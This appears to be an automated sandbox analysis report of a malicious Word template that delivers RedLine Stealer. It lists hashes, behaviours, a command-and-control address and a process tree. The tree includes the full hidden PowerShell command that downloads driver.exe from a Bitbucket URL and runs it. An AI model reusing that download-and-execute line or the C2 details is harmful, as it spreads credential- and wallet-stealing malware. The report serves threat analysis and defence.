Analysis
-
max time kernel
102s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2022 12:49
Behavioral task
behavioral1
Sample
qw.dotm
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
qw.dotm
Resource
win10v2004-20220812-en
General
-
Target
qw.dotm
-
Size
15KB
-
MD5
19cd6fd29ed067257e00f015b95f06b6
-
SHA1
76f46883574ac1e0b2c831ae4e15f2b786f663c3
-
SHA256
4a10e8fcc6e942f08c066c542cec8a4e2c1459c8d901e60cf6f7b74f0c032ec1
-
SHA512
4c28d8214a5e7b7a1f2f1feffc3ea06977aa7059c854a93248835727a106e01c12727101b22a320edf576c7d919674cd12e083be90f041cd5f1278af06bf7c01
-
SSDEEP
384:tmtZYh+oI+lpKrkjq2C781DXd6akwLWdxdkYB3to:qloI+lAx8Wakw6Lxk
Malware Config
Extracted
https://bitbucket.org/bitcryptoexchangeee/1/downloads/driver.exe
Extracted
redline
23/12/2022
45.138.27.123:31889
-
auth_value
50fd3920486b0eae99d8c0feb8010929
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2236 1012 powershell.exe 69 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 20 2236 powershell.exe 23 2236 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 1424 2d21412.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1424 set thread context of 1760 1424 2d21412.exe 87 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1012 WINWORD.EXE 1012 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2236 powershell.exe 2236 powershell.exe 1760 vbc.exe 1760 vbc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2236 powershell.exe Token: SeDebugPrivilege 1760 vbc.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1012 WINWORD.EXE 1012 WINWORD.EXE 1012 WINWORD.EXE 1012 WINWORD.EXE 1012 WINWORD.EXE 1012 WINWORD.EXE 1012 WINWORD.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 1012 wrote to memory of 2236 1012 WINWORD.EXE 82 PID 1012 wrote to memory of 2236 1012 WINWORD.EXE 82 PID 2236 wrote to memory of 1424 2236 powershell.exe 84 PID 2236 wrote to memory of 1424 2236 powershell.exe 84 PID 2236 wrote to memory of 1424 2236 powershell.exe 84 PID 1424 wrote to memory of 1760 1424 2d21412.exe 87 PID 1424 wrote to memory of 1760 1424 2d21412.exe 87 PID 1424 wrote to memory of 1760 1424 2d21412.exe 87 PID 1424 wrote to memory of 1760 1424 2d21412.exe 87 PID 1424 wrote to memory of 1760 1424 2d21412.exe 87 PID 1424 wrote to memory of 1760 1424 2d21412.exe 87 PID 1424 wrote to memory of 1760 1424 2d21412.exe 87 PID 1424 wrote to memory of 1760 1424 2d21412.exe 87
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qw.dotm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/bitcryptoexchangeee/1/downloads/driver.exe','2d21412.exe');Start-Process '2d21412.exe'2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\2d21412.exe"C:\Users\Admin\AppData\Local\Temp\2d21412.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
200KB
MD5f2bd768066b4581da1f4c6ae3b82cf35
SHA12fbe84052bae89d230529d9a82f781bb156f6bc5
SHA2564a3e358896e47f6106a459f130af00a37970be4439f231079f0d553b1f15e3fa
SHA5124f46f7e4e1b5270d84589081470ed37b29a4b020daf586c9381927e330f0ae18606c43ba5a28b0bd40c4601262167ebd805a19af0fb49eca5a3198056ae954ff
-
Filesize
200KB
MD5f2bd768066b4581da1f4c6ae3b82cf35
SHA12fbe84052bae89d230529d9a82f781bb156f6bc5
SHA2564a3e358896e47f6106a459f130af00a37970be4439f231079f0d553b1f15e3fa
SHA5124f46f7e4e1b5270d84589081470ed37b29a4b020daf586c9381927e330f0ae18606c43ba5a28b0bd40c4601262167ebd805a19af0fb49eca5a3198056ae954ff